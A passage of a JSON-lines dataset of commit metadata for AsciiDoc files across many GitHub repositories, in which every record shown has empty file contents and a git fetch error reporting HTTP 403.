2017-02-26-University-vs-Practical-Product-Ownership.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2017-02-26-University-vs-Practical-Product-Ownership.adoc","new_file":"_posts\/2017-02-26-University-vs-Practical-Product-Ownership.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09dc1cb249cd955c901401a2f8a8814d01b912ad","subject":"Add initial grubox notes","message":"Add initial grubox notes\n","repos":"jeaye\/jeaye.github.io,jeaye\/jeaye.github.io","old_file":"_drafts\/gruvbox.adoc","new_file":"_drafts\/gruvbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeaye\/jeaye.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c1015cfebc415fb84a3f3b6ba743832bcb0c443","subject":"y2b create post What Are VR Headphones?","message":"y2b create post What Are VR Headphones?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-20-What-Are-VR-Headphones.adoc","new_file":"_posts\/2016-11-20-What-Are-VR-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89b3afbc180f67759952dae3b1a2137af177bf43","subject":"create post Apple Is Deliberately Slowing Down Your iPhone","message":"create post Apple Is Deliberately Slowing Down Your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Apple-Is-Deliberately-Slowing-Down-Your-iPhone.adoc","new_file":"_posts\/2018-02-26-Apple-Is-Deliberately-Slowing-Down-Your-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edc49e3806a191ffc1ac41877d9f6988432872a7","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ff592092fe0096d618058b89839d690b90a7821","subject":"Update 2016-08-02-Yo.adoc","message":"Update 2016-08-02-Yo.adoc","repos":"vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io","old_file":"_posts\/2016-08-02-Yo.adoc","new_file":"_posts\/2016-08-02-Yo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vs4vijay\/vs4vijay.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7daa0687346768ab27ad3608ad311b9f92c27d61","subject":"Update 2016-7-2-Life.adoc","message":"Update 2016-7-2-Life.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-Life.adoc","new_file":"_posts\/2016-7-2-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2811f7dabc413c6a8b6ba972b4fab2e0b20262b8","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"057b26dbf15c772710bc5971c1ce062f70500f13","subject":"Update 2016-06-08-Rinna-In-Pepper.adoc","message":"Update 2016-06-08-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b081832eee62d4be83cca4669f20efb2617c559","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f482942721512ace0832bababd222c25f6e0dc76","subject":"Added AddonManager docs","message":"Added AddonManager docs","repos":"D9110\/core,ivannov\/core,D9110\/core,agoncal\/core,agoncal\/core,forge\/core,pplatek\/core,pplatek\/core,agoncal\/core,oscerd\/core,D9110\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,stalep\/forge-core,D9110\/core,jerr\/jbossforge-core,pplatek\/core,ivannov\/core,agoncal\/core,agoncal\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,agoncal\/core,ivannov\/core,oscerd\/core,pplatek\/core,pplatek\/core,pplatek\/core,D9110\/core,ivannov\/core,agoncal\/core,jerr\/jbossforge-core,D9110\/core,forge\/core,oscerd\/core,forge\/core,forge\/core,oscerd\/core,D9110\/core,ivannov\/core,oscerd\/core,pplatek\/core,oscerd\/core,stalep\/forge-core,D9110\/core,pplatek\/core,oscerd\/core,oscerd\/core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,forge\/core,oscerd\/core,forge\/core,ivannov\/core,forge\/core,jerr\/jbossforge-core,forge\/core,ivannov\/core,ivannov\/core,forge\/core,forge\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,agoncal\/core","old_file":"addon-manager\/README.asciidoc","new_file":"addon-manager\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d9faf95274d8cc907ecc9bf2d28ff01c219a3459","subject":"Update 2016-02-26-One.adoc","message":"Update 2016-02-26-One.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-One.adoc","new_file":"_posts\/2016-02-26-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe8f34f63ba57ed4a7908f8d3966943b68afced0","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33e63ba54faec291addfa6d4c2313c67d6472bed","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b52da1eb5fdcf56c02cbf899671e1571dae07b92","subject":"Delete 2017-01-25 Test asciidoc.adoc","message":"Delete 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ee3129e7545c016b1edcb5244c603d2ecae9e10","subject":"Update 2017-04-24-La-patisserie.adoc","message":"Update 2017-04-24-La-patisserie.adoc","repos":"lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie","old_file":"_posts\/2017-04-24-La-patisserie.adoc","new_file":"_posts\/2017-04-24-La-patisserie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lrabiet\/patisserie.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e609dca86ca733178968392b85611f60e74beb6","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4eb432236e78976cce1f41a3b66332d80a428e5f","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-maven-archetype","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-maven-archetype.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68be0856993c08a28f6682d75605baf616e69e7e","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-cors","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-cors.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"875f8f5eddf48b4fd8a26c1bf0c5a849b71937de","subject":"Update 2019-12-23-Third-Anniversary.adoc","message":"Update 2019-12-23-Third-Anniversary.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800856718caca8f16c4a98e4b0b63a0dae4c41d1","subject":"Slight changes to README.adoc","message":"Slight changes to README.adoc\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"805e152c0fdb7b78bc84fa1aa6ccfcb2a3a9cc36","subject":"Adding README","message":"Adding README\n","repos":"sim51\/neo4j-talend-component","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sim51\/neo4j-talend-component.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf44a4d7634d17b39405d09d47a89b40097f070","subject":"Update 2016-06-08-Rinna-In-Pepper.adoc","message":"Update 2016-06-08-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4001ae7bf25f7c96aaf09d7667a227dff187534","subject":"Update 2016-10-02-The-1th-content.adoc","message":"Update 2016-10-02-The-1th-content.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2016-10-02-The-1th-content.adoc","new_file":"_posts\/2016-10-02-The-1th-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16bd52f6c3218f5a0f325d4d5b699a970e1197ec","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a85ae90719b903701ce41040299985b687b91416","subject":"Update 2015-10-29-My-English-Title.adoc","message":"Update 2015-10-29-My-English-Title.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-My-English-Title.adoc","new_file":"_posts\/2015-10-29-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c191c66b84fc1bade4f238ecc7ce43558e3bfdc","subject":"Add README file in TorrentLocker directory","message":"Add README file in TorrentLocker directory\n","repos":"eset\/malware-research,eset\/malware-research,eset\/malware-research,eset\/malware-research","old_file":"torrentlocker\/README.adoc","new_file":"torrentlocker\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-research.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2cc3455e061bdda589ab4c3f4e1229ad87c9b0a7","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/09\/deref.adoc","new_file":"content\/news\/2021\/07\/09\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"dc7c2c414251cbc82674107a8e0a06079cfdf980","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/08\/05\/deref.adoc","new_file":"content\/news\/2022\/08\/05\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c80a6e3ee26825692af4fefcd05725eaf1fe9669","subject":"[docs] Update known issues docs for location awareness","message":"[docs] Update known issues docs for location awareness\n\nRemoves the clauses indicating rack awareness and\nmulti-datacenter are not supported and adds details on\nthe remaining limitations.\n\nChange-Id: I5b083cdf60629aacef3a3ac186a2191f8d7a00d0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12920\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d12e5945b1b9420fca79fdef8077c533240e9829","subject":"Update 2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","message":"Update 2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","new_file":"_posts\/2008-01-01-Draft-Convincing-Maven-To-Work-On-Fedora-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"813d647da132479cde23830e3728ad12f8a7f0a7","subject":"Update 2016-07-16-Chat.adoc","message":"Update 2016-07-16-Chat.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-16-Chat.adoc","new_file":"_posts\/2016-07-16-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e26edf72ac7c2f33268f1c14ff56d3d7037a788","subject":"Update 2015-09-17-Pull.adoc","message":"Update 2015-09-17-Pull.adoc","repos":"NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io","old_file":"_posts\/2015-09-17-Pull.adoc","new_file":"_posts\/2015-09-17-Pull.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NadineLaCuisine\/NadineLaCuisine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95055168ecfecb6ed512dad0307621edae057ff0","subject":"up post","message":"up post\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5.adoc","new_file":"_posts\/2017-09-01-fud5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d4e3f21d67a6ab61288c85606bcd81a96eca3d1","subject":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","message":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2889ec31c38902270d84f7960f044dee7db7cc0","subject":"Update 1993-8-11-commoncommonfunctionphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc9b41e4f840b1de02edb7aedd819e805c0452e","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9e1e6932c31d36aeec9dd4b385df65d7a43ec59","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed119b5707e3de3295194b6568d1ea02fd396075","subject":"Works on doc","message":"Works on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/ubf\/Bfldid.adoc","new_file":"doc\/api\/ubf\/Bfldid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ffefc21eabd1351366de722d3d930df4e09a052b","subject":"Added release instructions","message":"Added release instructions\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27096f16aa05b38898fa78951993b1fed91f0423","subject":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","message":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"114da9a29c93ae4616ac3d9be89617a00ee0235c","subject":"Update 2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","message":"Update 2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","new_file":"_posts\/2015-06-30-Desarrollo-de-una-aplicacion-desde-cero-El-patron-MVC-y-la-capa-de-presentacion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b227cb38f135c633c7ba1b51eb9cbae00866fae","subject":"y2b create post Call of Duty Black Ops 2 Hardened Edition Unboxing","message":"y2b create post Call of Duty Black Ops 2 Hardened Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Hardened-Edition-Unboxing.adoc","new_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Hardened-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c9fbba2831d6b9bf88c505c585d65d01e073601","subject":"Update 2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","message":"Update 2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","new_file":"_posts\/2015-11-12-us-hongkong-nutrition-supplements-price-comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e66c7f20f61b34a1bd5278c7352c5bd875ae9d3","subject":"Update 2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","message":"Update 2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","repos":"codingkapoor\/codingkapoor.github.io,codingkapoor\/codingkapoor.github.io,codingkapoor\/codingkapoor.github.io,codingkapoor\/codingkapoor.github.io","old_file":"_posts\/2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","new_file":"_posts\/2018-07-25-Covariance-Contravariance-in-Scala-Connecting-Dots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codingkapoor\/codingkapoor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f9b11caac20d8de2ee4f3d8c73a07cd63348a7","subject":"Update 2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","message":"Update 2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","new_file":"_posts\/2016-02-25-Luigis-Rollickin-Roadsters-to-open-on-March-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c3d0550c3a85f64d3d9b697dd7e54bb3af52932","subject":"Update 2017-07-31-to-reflect-on-the-cache.adoc","message":"Update 